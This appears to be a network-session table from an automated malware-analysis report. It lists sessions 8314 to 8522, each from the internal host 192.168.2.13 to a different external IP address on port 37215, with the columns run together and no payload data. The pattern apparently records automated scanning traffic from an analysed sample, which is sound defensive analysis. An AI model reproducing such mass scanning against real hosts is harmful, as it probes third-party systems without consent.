                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8314192.168.2.1333602157.111.55.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8315192.168.2.135790850.212.165.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8316192.168.2.1351570157.236.89.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8317192.168.2.134547841.159.50.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8318192.168.2.134504841.216.168.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8319192.168.2.1342838130.161.193.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8320192.168.2.134118886.89.215.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8321192.168.2.1346990197.204.79.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8322192.168.2.133896641.50.26.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8323192.168.2.1356826157.149.93.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8324192.168.2.1334784157.4.14.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8325192.168.2.1333156197.109.183.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8326192.168.2.1358522157.30.73.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8327192.168.2.1358182157.80.182.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8328192.168.2.133769041.213.227.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8329192.168.2.1359430154.178.6.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8330192.168.2.133816087.236.22.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8331192.168.2.1337998205.104.38.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8332192.168.2.1340564218.56.226.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8333192.168.2.1338600157.12.219.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8334192.168.2.1355004197.54.250.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8335192.168.2.135990241.118.19.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8336192.168.2.1350830157.254.184.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8337192.168.2.1350536197.78.189.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8338192.168.2.1359290157.39.123.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8339192.168.2.133469896.23.41.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8340192.168.2.135987041.223.169.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8341192.168.2.134612067.65.190.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8342192.168.2.135821292.98.11.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8343192.168.2.133979041.79.43.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8344192.168.2.1341194197.204.49.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8345192.168.2.1358812197.82.49.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8346192.168.2.1353940197.218.38.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8347192.168.2.1337306190.118.184.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8348192.168.2.1349864160.117.121.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8349192.168.2.1357904152.29.80.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8350192.168.2.1358216197.148.61.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8351192.168.2.134773641.239.88.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8352192.168.2.1340146104.35.252.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8353192.168.2.1346386157.200.36.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8354192.168.2.1343620157.12.41.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8355192.168.2.1337248192.108.215.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8356192.168.2.1352628197.97.209.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8357192.168.2.133716641.205.219.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8358192.168.2.133789241.69.214.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8359192.168.2.1334540197.17.105.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8360192.168.2.1341110197.134.138.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8361192.168.2.1339602197.135.251.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8362192.168.2.1358872197.161.91.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8363192.168.2.1333324157.61.53.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8364192.168.2.1344984157.251.157.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8365192.168.2.134668041.166.168.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8366192.168.2.135083469.218.148.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8367192.168.2.1351450157.47.185.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8368192.168.2.1338322197.78.248.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8369192.168.2.135643041.143.108.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8370192.168.2.1346830197.241.105.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8371192.168.2.135576889.158.80.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8372192.168.2.1354010197.5.180.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8373192.168.2.1357348157.37.189.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8374192.168.2.134292241.132.183.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8375192.168.2.133674441.90.91.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8376192.168.2.135847235.15.85.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8377192.168.2.13473069.174.113.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8378192.168.2.1353540157.62.110.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8379192.168.2.13559984.130.30.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8380192.168.2.135685441.168.220.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8381192.168.2.135630268.102.25.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8382192.168.2.1353578157.145.7.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8383192.168.2.1351864174.10.246.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8384192.168.2.1350182157.150.114.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8385192.168.2.1358342157.145.24.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8386192.168.2.1346994157.22.41.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8387192.168.2.1340070197.74.33.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8388192.168.2.1348410132.154.133.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8389192.168.2.1348302201.35.96.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8390192.168.2.1343168197.168.176.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8391192.168.2.1337050157.131.214.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8392192.168.2.134730217.212.158.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8393192.168.2.1349368157.173.247.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8394192.168.2.1357126158.145.219.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8395192.168.2.133306641.12.37.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8396192.168.2.1336442197.119.85.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8397192.168.2.1360536157.25.46.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8398192.168.2.135889637.73.253.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8399192.168.2.1335852157.193.37.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8400192.168.2.1353926102.13.165.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8401192.168.2.1351966157.252.82.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8402192.168.2.1341432197.217.202.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8403192.168.2.135245841.166.137.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8404192.168.2.1358080157.161.105.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8405192.168.2.1353306112.65.51.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8406192.168.2.1341796157.234.78.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8407192.168.2.133451641.102.112.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8408192.168.2.135030646.128.141.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8409192.168.2.1344110197.34.190.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8410192.168.2.1346636157.184.189.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8411192.168.2.135044441.57.148.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8412192.168.2.1342770183.240.67.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8413192.168.2.1347498157.10.138.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8414192.168.2.134308041.204.241.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8415192.168.2.134081241.157.75.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8416192.168.2.1342902157.147.9.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8417192.168.2.134024641.24.232.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8418192.168.2.1333834197.163.86.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8419192.168.2.135203841.146.152.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8420192.168.2.1340702197.173.237.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8421192.168.2.135472087.115.223.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8422192.168.2.1347152197.153.206.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8423192.168.2.1353424184.249.222.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8424192.168.2.1340380197.134.34.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8425192.168.2.1343574221.224.226.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8426192.168.2.133647241.127.240.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8427192.168.2.134196841.61.223.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8428192.168.2.1342860101.136.81.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8429192.168.2.134078441.161.168.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8430192.168.2.1360328197.50.25.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8431192.168.2.1337002157.22.163.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8432192.168.2.134923641.107.66.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8433192.168.2.1342836197.73.125.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8434192.168.2.133357214.55.122.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8435192.168.2.134784041.214.246.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8436192.168.2.1338244207.37.90.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8437192.168.2.134260684.7.143.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8438192.168.2.1350238197.183.247.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8439192.168.2.1340550159.183.96.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8440192.168.2.1346560157.114.246.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8441192.168.2.135322641.99.81.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8442192.168.2.134538041.167.15.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8443192.168.2.1344536157.36.58.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8444192.168.2.1333272182.223.194.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8445192.168.2.133338276.82.43.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8446192.168.2.1344708197.145.174.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8447192.168.2.1351532157.193.124.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8448192.168.2.133733836.0.47.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8449192.168.2.1341576106.22.120.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8450192.168.2.1354220157.241.183.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8451192.168.2.1340274157.129.175.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8452192.168.2.1352678197.123.189.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8453192.168.2.1346092157.47.187.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8454192.168.2.1337168197.190.125.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8455192.168.2.134748641.147.41.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8456192.168.2.134230441.172.254.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8457192.168.2.1355346138.216.193.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8458192.168.2.1354230157.185.159.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8459192.168.2.1333766157.89.72.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8460192.168.2.135932841.67.163.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8461192.168.2.1338108197.138.249.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8462192.168.2.1352532157.79.214.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8463192.168.2.133998697.228.87.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8464192.168.2.135840641.225.125.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8465192.168.2.1347312197.9.229.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8466192.168.2.1353942197.95.206.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8467192.168.2.134880641.231.69.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8468192.168.2.1346286157.48.136.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8469192.168.2.1336422197.123.156.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8470192.168.2.135701841.109.65.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8471192.168.2.1333194197.231.112.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8472192.168.2.1348524197.190.180.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8473192.168.2.134324079.127.143.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8474192.168.2.1343476157.126.233.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8475192.168.2.1349460197.224.169.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8476192.168.2.1338416197.27.52.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8477192.168.2.133572041.226.108.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8478192.168.2.1348882197.217.93.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8479192.168.2.1337330193.138.165.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8480192.168.2.133286841.135.82.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8481192.168.2.134882241.168.149.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8482192.168.2.1343400197.119.173.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8483192.168.2.1344366197.52.99.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8484192.168.2.13467148.167.207.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8485192.168.2.133568441.57.142.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8486192.168.2.1334926197.157.24.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8487192.168.2.1354720157.47.220.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8488192.168.2.1343314197.55.145.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8489192.168.2.1346116197.87.183.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8490192.168.2.133318041.169.60.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8491192.168.2.1342130197.139.213.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8492192.168.2.135567441.86.165.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8493192.168.2.1337626176.128.135.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8494192.168.2.134534469.36.122.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8495192.168.2.134931841.66.152.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8496192.168.2.1341788171.97.170.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8497192.168.2.136063241.124.249.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8498192.168.2.134686241.136.143.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8499192.168.2.1345718197.2.231.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8500192.168.2.1353152128.118.75.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8501192.168.2.136030841.177.165.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8502192.168.2.1337110162.192.101.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8503192.168.2.135098641.13.129.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8504192.168.2.1341656157.191.231.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8505192.168.2.1360810197.153.88.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8506192.168.2.135707041.29.210.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8507192.168.2.1344756197.90.118.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8508192.168.2.1353226223.26.145.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8509192.168.2.1357336157.21.25.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8510192.168.2.1346462197.215.199.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8511192.168.2.134406841.54.8.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8512192.168.2.1344608157.240.250.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8513192.168.2.1348862197.216.38.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8514192.168.2.135404441.228.8.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8515192.168.2.136089841.221.97.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8516192.168.2.135643041.222.240.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8517192.168.2.1352196114.183.166.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8518192.168.2.1349320162.59.16.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8519192.168.2.133641272.81.171.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8520192.168.2.133595241.191.166.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8521192.168.2.135460213.20.188.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8522192.168.2.1349560157.0.131.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
